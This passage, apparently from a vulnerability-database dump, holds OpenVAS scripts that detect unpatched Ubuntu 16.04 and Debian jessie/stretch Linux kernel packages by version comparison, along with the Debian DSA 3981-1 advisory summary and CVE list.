script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1009-kvm\", ver:\"4.4.0-1009.14\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1033-gke\", ver:\"4.4.0-1033.33\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1039-aws\", ver:\"4.4.0-1039.48\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1076-raspi2\", ver:\"4.4.0-1076.84\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1078-snapdragon\", 
ver:\"4.4.0-1078.83\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-generic-lpae\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-lowlatency\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-e500mc\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc-smp\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-emb\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-98-powerpc64-smp\", ver:\"4.4.0-98.121\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1039.41\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.4.0.1033.34\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1009.9\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.98.103\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1076.76\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1078.70\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T19:22:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000380", "CVE-2017-1000111", "CVE-2017-14489", "CVE-2017-12146", "CVE-2017-7518", "CVE-2017-1000252", "CVE-2017-14106", "CVE-2017-14140", "CVE-2017-10661", "CVE-2017-1000251", "CVE-2017-1000112", "CVE-2017-7558", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-1000370", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-1000371", "CVE-2017-14497", "CVE-2017-12154", "CVE-2017-11600"], "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to privilege 
escalation, denial of service or information\nleaks.\n\nCVE-2017-7518\nAndy Lutomirski discovered that KVM is prone to an incorrect debug\nexception (#DB) error occurring while emulating a syscall\ninstruction. A process inside a guest can take advantage of this\nflaw for privilege escalation inside a guest.\n\nCVE-2017-7558 (stretch only)\n\nStefano Brivio of Red Hat discovered that the SCTP subsystem is\nprone to a data leak vulnerability due to an out-of-bounds read\nflaw, allowing to leak up to 100 uninitialized bytes to userspace.\n\nCVE-2017-10661 (jessie only)\n\nDmitry Vyukov of Google reported that the timerfd facility does\nnot properly handle certain concurrent operations on a single file\ndescriptor. This allows a local attacker to cause a denial of\nservice or potentially execute arbitrary code.\n\nDescription truncated. Please see the references for more information.", "modified": "2020-06-08T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310703981", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703981", "type": "openvas", "title": "Debian Security Advisory DSA 3981-1 (linux - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 3981-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH http://greenbone.net\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703981\");\n script_version(\"2020-06-08T06:52:36+0000\");\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\", \"CVE-2017-1000251\", \"CVE-2017-1000252\", \"CVE-2017-1000370\", \"CVE-2017-1000371\", \"CVE-2017-1000380\", \"CVE-2017-10661\", \"CVE-2017-11600\", \"CVE-2017-12134\", \"CVE-2017-12146\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14106\", \"CVE-2017-14140\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14497\", \"CVE-2017-7518\", \"CVE-2017-7558\");\n script_name(\"Debian Security Advisory DSA 3981-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 06:52:36 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 00:00:00 +0200 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3981.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"linux on 
Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.43-2+deb8u5.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 4.9.30-2+deb9u5.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-7518\nAndy Lutomirski discovered that KVM is prone to an incorrect debug\nexception (#DB) error occurring while emulating a syscall\ninstruction. A process inside a guest can take advantage of this\nflaw for privilege escalation inside a guest.\n\nCVE-2017-7558 (stretch only)\n\nStefano Brivio of Red Hat discovered that the SCTP subsystem is\nprone to a data leak vulnerability due to an out-of-bounds read\nflaw, allowing to leak up to 100 uninitialized bytes to userspace.\n\nCVE-2017-10661 (jessie only)\n\nDmitry Vyukov of Google reported that the timerfd facility does\nnot properly handle certain concurrent operations on a single file\ndescriptor. This allows a local attacker to cause a denial of\nservice or potentially execute arbitrary code.\n\nDescription truncated. 
Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-s390\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-4kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-5kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-arm64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mips\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-mipsel\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-powerpc\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-ppc64el\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.43-2+deb8u5\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", 
ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", 
ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.43-2+deb8u5\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.43-2+deb8u5\", 
rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"hyperv-daemons\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcpupower-dev\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcpupower1\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libusbip-dev\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-arm\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-s390\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-x86\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-cpupower\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-4kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-5kc-malta\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686-pae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-arm64\", 
ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armel\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armhf\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-i386\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips64el\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mipsel\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-ppc64el\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-s390x\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-amd64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-arm64\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp-lpae\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common-rt\", ver:\"4.9.30-2+deb9u5\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = 
